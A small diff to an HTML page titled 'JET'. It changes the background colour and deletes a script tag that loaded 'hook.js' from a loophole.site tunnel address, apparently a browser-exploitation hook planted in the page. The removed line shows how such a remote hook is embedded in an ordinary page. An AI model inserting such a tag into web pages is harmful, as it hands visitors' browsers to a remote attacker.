--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <title>JET</title>
     <style>
         body {
-            background-color: black;
+            background-color: orange;
             display: flex;
             align-items: center;
             justify-content: center;
@@ -105,7 +105,7 @@
     }
 
     </script>
-    <script src="https://294d2cf238e0640410fc843808c35523.loophole.site/hook.js"></script>
+   
 </body>
 
 </html>
